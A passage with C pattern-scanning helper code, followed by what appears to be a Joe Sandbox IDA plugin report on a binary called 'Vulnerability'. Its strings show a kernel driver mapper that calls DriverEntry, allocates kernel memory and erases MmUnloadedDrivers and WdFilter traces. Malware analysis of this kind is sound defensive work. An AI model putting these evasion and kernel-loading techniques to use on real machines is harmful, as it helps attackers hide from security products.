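/* Offset of the first match of pat/msk in buf, or -1 if not found or the
 * mask contains a character other than 'x' or '?'. */
long find_pattern(const uint8_t *buf, size_t len,
                  const uint8_t *pat, const char *msk)
{
    size_t plen = strlen(msk);
    if (plen == 0 || plen > len)
        return -1;
    for (size_t i = 0; i + plen <= len; i++) {
        size_t j = 0;
        for (; j < plen; j++) {
            if (msk[j] == 'x') {
                if (buf[i + j] != pat[j])
                    break;
            } else if (msk[j] != '?') {
                return -1;            /* malformed mask character */
            }
        }
        if (j == plen)
            return (long)i;
    }
    return -1;
}

/* For an instruction at insn_off that is insn_len bytes long and carries a
 * signed disp32 at disp_off bytes into it (e.g. lea/mov r64,[rip+disp32]),
 * return the offset the displacement points to, or -1 if it leaves buf. */
long resolve_rip_relative(const uint8_t *buf, size_t len, size_t insn_off,
                          size_t disp_off, size_t insn_len)
{
    if (insn_off > len || insn_len > len - insn_off || disp_off + 4 > insn_len)
        return -1;
    int32_t disp;
    memcpy(&disp, buf + insn_off + disp_off, sizeof disp);
    long target = (long)(insn_off + insn_len) + disp;   /* RIP = next insn */
    if (target < 0 || (size_t)target >= len)
        return -1;
    return target;
}

long demo_scan(void)   { return find_pattern(code, sizeof code, sig, mask); }

long demo_target(void)
{
    long hit = demo_scan();
    if (hit < 0)
        return -1;
    /* lea rcx,[rip+disp32] is 7 bytes with the displacement at +3 */
    return resolve_rip_relative(code, sizeof code, (size_t)hit, 3, 7);
}

int main(void)
{
    long hit = demo_scan();
    long tgt = demo_target();
    printf("[+] pattern hit at 0x%lx, lea target 0x%lx\n", hit, tgt);
    return (hit == 2 && tgt == 0x12) ? 0 : 1;
}
```

The scanner returns the first hit only; on a real kernel image the same mask can match in more than one place, which is why the sample logs a fallback ("Found WdFilter MpFreeDriverInfoEx with second pattern") and validates a magic field before it frees anything. Treat a resolved address the same way: verify what it points to before acting on it.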
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$ControlDevice$Virtual$??6?$basic_ostream@D@std@@@std@@FreeU?$char_traits@V01@@$InformationQuerySystem$AllocCurrentProcessmemset
                                                                                          • String ID: 0$[!] Failed to find device_object$[!] Failed to find driver name$[!] Failed to find driver_object$[!] Failed to find driver_section$[!] Failed to read driver name$[!] Failed to write driver name length$[+] MmUnloadedDrivers Cleaned:
                                                                                          • API String ID: 48251577-3329613743
                                                                                          • Opcode ID: 3575150da220efd6ffb7dc57c2255807822c993415969e1ebdd93622c0f9fa6e
                                                                                          • Instruction ID: 232bc270ed0b9949634f361007b04c8b032b10047658fd32318a7bcb099f31e7
                                                                                          • Opcode Fuzzy Hash: 3575150da220efd6ffb7dc57c2255807822c993415969e1ebdd93622c0f9fa6e
                                                                                          • Instruction Fuzzy Hash: 5EF18022B18B818AE700DF61E4402ECBBB5EB4979CB948535DE4D27B59DF3CD645C320
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                          • String ID:
                                                                                          • API String ID: 4293554670-0
                                                                                          • Opcode ID: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
                                                                                          • Instruction ID: 1f5d896f77706fea627a03d14452e2534e0ac6d83e067096b4728b1aa9b23678
                                                                                          • Opcode Fuzzy Hash: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
                                                                                          • Instruction Fuzzy Hash: 0391EB32B08AC242E678AF15A406675EBB5AF847B8F848330DA7D437D5DF3CE6458720
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Free$ControlDevice$Alloc_invalid_parameter_noinfo_noreturn_stricmpmemset
                                                                                          • String ID: 0$@
                                                                                          • API String ID: 2904545761-1545510068
                                                                                          • Opcode ID: f271814436e411f149ca223381442c2e1ac6ccb45c9758756a7aef138bd86b92
                                                                                          • Instruction ID: 673b53e771c776444308e5eaaf5b0fbfe7d7bc8a8e928ed6ed5da584c70748fa
                                                                                          • Opcode Fuzzy Hash: f271814436e411f149ca223381442c2e1ac6ccb45c9758756a7aef138bd86b92
                                                                                          • Instruction Fuzzy Hash: 87A1B472F08B8185EB10DF25E4403ADABA5FB487A8F908235DA9D53B98DF3CD581C750
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Free$InformationQuerySystem$Alloc_invalid_parameter_noinfo_noreturn_stricmp
                                                                                          • String ID:
                                                                                          • API String ID: 562193759-0
                                                                                          • Opcode ID: 659d89a33b8c4e84e73f9b44b03caa3a4d5bd46a419bca97b8d83545358b8e36
                                                                                          • Instruction ID: f1698d1698b894bf77bf9f03e9dc7006cd90b1f4abeefd354ec576eadab6bf9c
                                                                                          • Opcode Fuzzy Hash: 659d89a33b8c4e84e73f9b44b03caa3a4d5bd46a419bca97b8d83545358b8e36
                                                                                          • Instruction Fuzzy Hash: CA51DA61B0858142EB25EF15E80537AEA76FF85BF8F84C231DA5D876D4DE3CE6418710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 313767242-0
                                                                                          • Opcode ID: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
                                                                                          • Instruction ID: 8cfb9182fa5daaca43f5a22b1a0f31bf9f0ef1942a7dc130eaec36b921cd05dd
                                                                                          • Opcode Fuzzy Hash: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
                                                                                          • Instruction Fuzzy Hash: C0313E72608BC186EB609F60E8413FDB764FB84758F84803ADA4E47B95DF38D648C720
                                                                                          APIs
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41FF93
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41FF8C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID: gfffffff$gfffffff
                                                                                          • API String ID: 1934640635-161084747
                                                                                          • Opcode ID: 32d287f5089f1c4019f492f4e82f17f276e333e0f2eac9d65bf056a087128946
                                                                                          • Instruction ID: f274b28727eb7812dfff013136b88ae41328791d87400455b671120ad5470b09
                                                                                          • Opcode Fuzzy Hash: 32d287f5089f1c4019f492f4e82f17f276e333e0f2eac9d65bf056a087128946
                                                                                          • Instruction Fuzzy Hash: A0A1DFA2B14BC982EA00DF16E44426DB7A4F758B98FA09232DF8D47755DF38E6D2C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
                                                                                          • Instruction ID: 18fe863d56a13eed63544e46102c353230843bb12c89bf170f91957212f45f83
                                                                                          • Opcode Fuzzy Hash: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
                                                                                          • Instruction Fuzzy Hash: 9211C222B14F418AEB00DF60E8452B873B0F74876CF840E31DA2D427A8DF3CE2548350
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatInfoLocaleMessage
                                                                                          • String ID: !x-sys-default-locale
                                                                                          • API String ID: 4235545615-2729719199
                                                                                          • Opcode ID: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
                                                                                          • Instruction ID: 875a26b23f994507c46e43be131be369d52e387ee69c98fbd385c141c4fd777a
                                                                                          • Opcode Fuzzy Hash: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
                                                                                          • Instruction Fuzzy Hash: 7901A171E087C182E7149F11B4017AAEAA6FB847A8F84C035DA8907A95CF3CD604C710
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
                                                                                          • Instruction ID: bf9da3b003ae7171d83da0e7ce58dce04bc07c659d2d2dc00ed010659843585a
                                                                                          • Opcode Fuzzy Hash: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
                                                                                          • Instruction Fuzzy Hash: BBA002A1A1CC82E4EB45FF00FC52070EB70FB50368BD09471D51D528A19F3CEA44D764
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32 ref: 00007FF7CC41E0B0
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7CC41E283
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E293
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41E2A3
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41E2D8
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC41E31A
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CC41E326
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E345
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E60D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@??6?$basic_ostream@_D@std@@@std@@U?$char_traits@U?$char_traits@_V01@@W@std@@@std@@$memmove$AllocV21@@Vios_base@1@Virtual
                                                                                          • String ID: bytes of PE Header$ExAllocatePoolWithTag$[!] Failed to find ExAllocatePool$[+] DriverEntry returned 0x$[+] Freeing memory$[+] Image base has been allocated at 0x$[+] Memory has been released$[+] Skipped 0x$[-] Callback returns false, failed!$[-] Failed to allocate remote image in kernel$[-] Failed to call driver entry$[-] Failed to fix cookie$[-] Failed to resolve imports$[-] Failed to write local image to remote image$[-] Image is not 64 bit$[-] Invalid format of PE image$[-] WARNING: Failed to free memory!$[<] Calling DriverEntry 0x
                                                                                          • API String ID: 3661745735-2368498643
                                                                                          • Opcode ID: 793d186afd701ffc3feeccafb3c296f166acf9444246a768472353144e4d0500
                                                                                          • Instruction ID: 84c4137ac9ea20d381864dd2268d28165a1d9fa7118a26615c5285cabfb418fd
                                                                                          • Opcode Fuzzy Hash: 793d186afd701ffc3feeccafb3c296f166acf9444246a768472353144e4d0500
                                                                                          • Instruction Fuzzy Hash: 2A026865F08AC285EA10EF61E8456B8AB62BF45BA8FD0C031DD4D4769ADF3CE645C360
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41D9D3
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DA13
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41DB2A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DB6D
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DC60
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41DC20
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DA36
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41DD27
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DD67
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DD8A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DDD3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevice_invalid_parameter_noinfo_noreturn$AcquireExclusiveLockmemmovememset
                                                                                          • String ID: 0$MmAllocatePagesForMdl$MmMapLockedPagesSpecifyCache$MmProtectMdlSystemAddress$[!] Failed to find MmAlocatePagesForMdl$[!] Failed to find MmMapLockedPagesSpecifyCache$[!] Failed to find MmProtectMdlSystemAddress$[+] Allocated pages for mdl$[-] Can't allocate pages for mdl$[-] Can't change protection for mdl pages, cleaning up$[-] Can't read the _MDL : byteCount$[-] Can't set mdl pages cache, cleaning up.$[-] Couldn't allocate enough memory, cleaning up
                                                                                          • API String ID: 2001844386-3948469999
                                                                                          • Opcode ID: 655b52af58247cf43af727550287d73903cfe6b9655883f29f5227e71485c835
                                                                                          • Instruction ID: 4a0c3aadeb6de083da98beca3dbde58121b2f49f5125e4290d738481fd800580
                                                                                          • Opcode Fuzzy Hash: 655b52af58247cf43af727550287d73903cfe6b9655883f29f5227e71485c835
                                                                                          • Instruction Fuzzy Hash: 4DE16062E18BC295EA00FF65E8412B8AB61AF447BCFD4D231D95D52695EF3CE345C320
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415AD0
                                                                                          • CloseHandle.KERNEL32 ref: 00007FF7CC415AE3
                                                                                            • Part of subcall function 00007FF7CC4145E0: memset.VCRUNTIME140 ref: 00007FF7CC414325
                                                                                            • Part of subcall function 00007FF7CC4145E0: GetTempPathW.KERNEL32 ref: 00007FF7CC414333
                                                                                            • Part of subcall function 00007FF7CC4145E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC414453
                                                                                          • CloseHandle.KERNEL32 ref: 00007FF7CC415AF6
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC415B56
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC415B85
                                                                                            • Part of subcall function 00007FF7CC4189C0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4189F3
                                                                                            • Part of subcall function 00007FF7CC4189C0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC418A12
                                                                                            • Part of subcall function 00007FF7CC4189C0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC418A44
                                                                                            • Part of subcall function 00007FF7CC4189C0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC418A5F
                                                                                            • Part of subcall function 00007FF7CC4189C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC418AA9
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415BCA
                                                                                            • Part of subcall function 00007FF7CC419EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F50
                                                                                            • Part of subcall function 00007FF7CC419EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F72
                                                                                          • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7CC415BD0
                                                                                          • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7CC415BD9
                                                                                          • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7CC415C26
                                                                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z.MSVCP140 ref: 00007FF7CC415C64
                                                                                          • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC415C74
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415CA2
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC415CCF
                                                                                          • _wremove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7CC415CEE
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC415D71
                                                                                          • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC415D7C
                                                                                          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC415D86
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC415DC6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
